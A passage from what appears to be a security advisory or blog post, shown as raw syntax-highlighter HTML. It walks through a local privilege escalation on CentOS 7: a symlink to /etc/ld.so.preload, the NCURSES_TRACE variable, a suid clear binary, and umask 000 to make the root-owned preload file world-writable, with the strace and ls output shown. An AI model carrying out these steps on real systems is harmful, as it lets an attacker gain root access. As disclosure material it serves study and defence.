<\/span><span class=\"crayon-v\">ln<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">preload <\/span><span class=\"crayon-i\">trace<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f40501298763-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f40501298763-8\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">centos7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ls<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">l<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trace <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f40501298763-9\"><span class=\"crayon-v\">lrwxrwxrwx<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xxxxx <\/span><span class=\"crayon-i\">wheel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">May<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">trace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">preload<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f40501298763-10\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">centos7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pwd<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f40501298763-11\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">xxxxx<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f40501298763-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f40501298763-13\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">centos7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">export <\/span><span class=\"crayon-v\">NCURSES_TRACE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">clear<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0019 seconds] -->  <\/p>\n<p>Ncurses will then write to the &#8216;<em>trace<\/em>&#8216; file and follow the symlink when clear (having root suid permissions) is run:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-588fbc3496f43111745357\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> getcwd(&#8220;\/home\/xxxxx&#8221;, 4084) = 12  stat(&#8220;\/home\/xxxxx\/trace&#8221;, 0x7ffcb0635510) = -1 ENOENT (No such file or directory)  access(&#8220;\/home\/xxxxx\/trace&#8221;, W_OK) = -1 ENOENT (No such file or directory)  access(&#8220;\/home\/xxxxx\/&#8221;, R_OK|W_OK|X_OK) = 0  brk(0) = 0xac0000  brk(0xae1000) = 0xae1000  brk(0) = 0xae1000  open(&#8220;\/home\/xxxxx\/trace&#8221;, O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f43111745357-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f43111745357-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f43111745357-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f43111745357-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f43111745357-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f43111745357-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f43111745357-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f43111745357-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f43111745357-1\"><span class=\"crayon-e\">getcwd<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/home\/xxxxx&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4084<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f43111745357-2\"><span class=\"crayon-e\">stat<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/home\/xxxxx\/trace&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7ffcb0635510<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ENOENT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">No <\/span><span class=\"crayon-e\">such <\/span><span class=\"crayon-e\">file <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">directory<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f43111745357-3\"><span class=\"crayon-e\">access<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/home\/xxxxx\/trace&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">W_OK<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ENOENT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">No <\/span><span class=\"crayon-e\">such <\/span><span class=\"crayon-e\">file <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">directory<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f43111745357-4\"><span class=\"crayon-e\">access<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/home\/xxxxx\/&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R_OK<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">W_OK<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">X_OK<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f43111745357-5\"><span class=\"crayon-e\">brk<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xac0000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f43111745357-6\"><span class=\"crayon-e\">brk<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xae1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xae1000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f43111745357-7\"><span class=\"crayon-e\">brk<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xae1000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f43111745357-8\"><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/home\/xxxxx\/trace&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">O_WRONLY<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">O_CREAT<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">O_TRUNC<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0666<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0015 seconds] -->  <\/p>\n<p>As the result, the target file <em>\/etc\/ldo.so.preload<\/em> will be created:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-588fbc3496f46195088484\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [xxxxx@centos7 ~]$ ls -l \/etc\/ld.so.preload   ERROR: ld.so: object &#8216;TRACING&#8217; from \/etc\/ld.so.preload cannot be preloaded: ignored.  ERROR: ld.so: object &#8216;NCURSES&#8217; from \/etc\/ld.so.preload cannot be preloaded: ignored.  ERROR: ld.so: object &#8216;version&#8217; from \/etc\/ld.so.preload cannot be preloaded: ignored.  ERROR: ld.so: object &#8216;5.9.20110404&#8217; from \/etc\/ld.so.preload cannot be preloaded: ignored.  ERROR: ld.so: object &#8216;(tracelevel=0x14)&#8217; from \/etc\/ld.so.preload cannot be preloaded: ignored.  -rw-rw&#8212;-. 1 root wheel 55 May 15 00:36 \/etc\/ld.so.preload<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f46195088484-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f46195088484-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f46195088484-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f46195088484-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f46195088484-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-588fbc3496f46195088484-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f46195088484-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f46195088484-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">xxxxx<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">centos7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ls<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">l<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">preload <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f46195088484-2\"><span class=\"crayon-v\">ERROR<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;TRACING&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">preload <\/span><span class=\"crayon-e\">cannot <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-v\">preloaded<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ignored<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f46195088484-3\"><span class=\"crayon-v\">ERROR<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;NCURSES&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">preload <\/span><span class=\"crayon-e\">cannot <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-v\">preloaded<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ignored<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f46195088484-4\"><span class=\"crayon-v\">ERROR<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;version&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">preload <\/span><span class=\"crayon-e\">cannot <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-v\">preloaded<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ignored<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f46195088484-5\"><span class=\"crayon-v\">ERROR<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;5.9.20110404&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">preload <\/span><span class=\"crayon-e\">cannot <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-v\">preloaded<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ignored<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-588fbc3496f46195088484-6\"><span class=\"crayon-v\">ERROR<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;(tracelevel=0x14)&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">preload <\/span><span class=\"crayon-e\">cannot <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-v\">preloaded<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ignored<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f46195088484-7\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rw<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rw<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root <\/span><span class=\"crayon-i\">wheel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">55<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">May<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">36<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ld<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">preload<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0026 seconds] -->  <\/p>\n<p>If we repeat the test and run:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-588fbc3496f49648029415\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> umask 000<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-588fbc3496f49648029415-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-588fbc3496f49648029415-1\"><span class=\"crayon-i\">umask<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>Before calling clear. Then the file will be created with world-writable permissions:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-588fbc3496f4b930392614\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 